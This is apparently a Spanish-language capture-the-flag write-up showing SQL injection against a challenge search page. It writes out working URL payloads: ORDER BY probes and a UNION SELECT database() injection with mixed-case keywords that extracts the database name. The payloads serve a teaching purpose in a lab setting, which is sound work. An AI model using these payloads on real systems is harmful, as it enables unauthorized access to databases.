By HackBUAZ Team
Es un buscador
que al parecer tiene una injeccion SQL… así funciona de manera normal cuando le introduces la palabra Naco dada por el reto:
Pero entonces aqui es tratar de imaginar la
sentencia que hay detrás
Entonces puede ser que sea una parecida a
esta…
select definicion from definiciones where
palabras = ‘ entrada‘
Entonces podemos cerrar las comillas y
meter nuestro codigo despues….
Intentamos un caso donde de una respuesta true (que el SQL query traiga informacion):
http://url?buscar.php?Buscar=naco'+ordEr+bY+1;#
Ahora un caso donde el query no traiga informacion (false):
http://url?buscar.php?Buscar=naco'+ordEr+bY+2;#
Con esta logica aprendida confirmamos que podemos ejecutar exitosamente queries asi que solo buscamos el nombre de la Base de Datos via comando de MySQL database(); que fue lo que pedia el reto:
http://url?buscar.php?Buscar='+UniOn+SelECt+dAtAbAse();#
Comments
Post a Comment